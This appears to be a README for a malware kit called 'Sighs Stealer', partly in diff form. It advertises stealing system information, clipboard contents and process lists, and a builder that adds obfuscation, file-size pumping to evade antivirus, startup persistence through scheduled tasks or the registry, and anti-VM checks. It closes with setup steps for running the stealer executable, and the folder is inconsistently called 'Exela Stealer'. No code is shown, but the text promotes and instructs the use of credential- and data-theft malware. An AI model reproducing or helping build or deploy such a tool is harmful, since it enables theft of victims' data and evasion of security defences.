sighstory/Sighs/Readme.txt

 💻 System Info Stealer - Steals system information.
 📋 Last Clipboard Text - Steals the last clipboard text.
 💻 Process Stealer - Steals running processes.

+Sighs Stealer's builder provides the following options:

+🔀 Realtime Obfuscation - Applies real-time obfuscation techniques.
+💾 File Pumper (Optional) - Pump your file size to evade detection.
+🚀 Startup Methods (Optional) - Use from schtask or regedit or folder startup options for startup.
+🎨 Icon Changer (Optional) - Changes the program icon (must end in .ico).
+🚫 Anti-VM (Optional) - It uses 12 different Anti-VM methods for enhanced security.

+⬇️ Download and Install python 3.11.0
+⬇️ Extract the zip file.
+👉 Navigate to the Exela Stealer folder and double click Sighstealer.exe 🚀 Follow the on-screen instructions to complete the setup.